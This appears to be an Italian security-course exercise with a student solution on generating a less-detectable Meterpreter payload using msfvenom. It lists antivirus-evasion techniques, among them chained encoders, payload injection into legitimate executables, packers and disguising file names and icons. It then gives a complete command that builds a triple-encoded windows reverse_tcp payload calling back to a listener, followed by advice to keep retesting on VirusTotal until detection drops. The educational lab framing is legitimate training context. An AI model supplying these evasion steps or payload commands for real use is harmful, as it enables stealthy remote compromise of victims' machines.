

Traccia Esercizio:

Esercizio di Oggi: Creazione di un Malware con Msfvenom

Obiettivo dell'Esercizio

L'esercizio di oggi consiste nel creare un malware utilizzando msfvenom che sia meno rilevabile rispetto al malware analizzato durante la lezione.

Passaggi da Seguire

1. Preparazione dell'Ambiente Assicuratevi di avere un ambiente di lavoro sicuro e isolato, preferibilmente una macchina virtuale, per evitare danni al sistema principale.
2. Utilizzo di msfvenom per generare il malware.
3. Migliorare la Non Rilevabilità
4. Test del Malware una volta generato.
5. Analisi dei Risultati Confronta i risultati del tuo malware con quelli analizzati durante la lezione. Valuta le differenze in termini di rilevabilità e discuti le possibili migliorie.

Conclusione

L'obiettivo di questo esercizio è non solo creare un malware funzionale, ma anche sviluppare la capacità di migliorare la non rilevabilità. Questo tipo di pratica è essenziale per comprendere meglio le tecniche utilizzate sia dagli attaccanti che dai difensori nel campo della sicurezza informatica.

Tecniche per migliorare l'invisibilit  del tuo payload e ridurre ulteriormente la possibilit  di rilevamento

- **Cambiare Encoder:** Usa una combinazione diversa di encoders o prova con altri encoders disponibili in **msfvenom**. Alcuni encoders potrebbero essere meno riconoscibili dai motori antivirus. Mantenere encoder su diversi livelli sfruttando "J".
- **Aumentare le iterazioni:** Aumenta il numero di iterazioni per ogni encoder. Maggiore   il numero di iterazioni, pi  variazioni avr  il payload.
- **Usare Encoder Personalizzati:** Se hai esperienza di programmazione, puoi creare il tuo encoder personalizzato che non sia conosciuto dai motori antivirus.
- **Modificare il Payload:** Personalizza il payload di Meterpreter per cambiare la firma. Questo pu  includere la modifica di variabili, funzioni o l'inserimento di codice inutile (NOP sleds).
- **Utilizzare Wrapper:** Incapsulare il payload all'interno di un altro programma o script che sembra innocuo. Questo pu  includere tecniche di steganografia o l'uso di packer.
- **Obfuscazione:** Usa strumenti di offuscamento per rendere il codice del payload pi  difficile da analizzare per gli antivirus.
- **Usare accorgimenti come:** usare payload meno noti, rinominare il file perche' il nome pu  attirare sistemi euristici, cambiare icona del file, integrare il payload in documenti o installatori.
- **"x/path/nomefile.exe"** permette di iniettare il payload in un legittimo eseguibile.
- **"-k"** mantiene il programma funzionante dopo l'iniezione per evitare di far scattare sospetti.

Esempio di Comando Migliorato

Proviamo a modificare il comando per migliorare l'invisibilità del payload:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.23 LPORT=5959 -a  
x86 --platform windows -e x86/shikata_ga_nai -i 200 -f raw | msfvenom -a x86 --  
platform windows -e x86/xor_dynamic -i 200 -f raw | msfvenom -a x86 --platform  
windows -e x86/shikata_ga_nai -i 200 -o polimorficomm_v2.exe
```

Spiegazione delle Modifiche

Incremento delle Iterazioni (-i 200)

Aumentare il numero di iterazioni da 100 e 138 a 200 per ogni fase di codifica.

Uso di un Encoder Diverso (x86/xor_dynamic)

Aggiungere un encoder diverso (xor_dynamic) tra le fasi di shikata_ga_nai per aggiungere un livello di offuscamento diverso.

Passaggi Successivi

Testare Nuovamente: Dopo aver generato il nuovo payload, testalo nuovamente su VirusTotal per vedere se il tasso di rilevamento è diminuito.

Analizzare i Risultati: Se il payload è ancora rilevato, continua a sperimentare con diversi encoders e iterazioni.

Monitoraggio dei Risultati: Continua a monitorare i risultati su VirusTotal e adatta la tua strategia di conseguenza.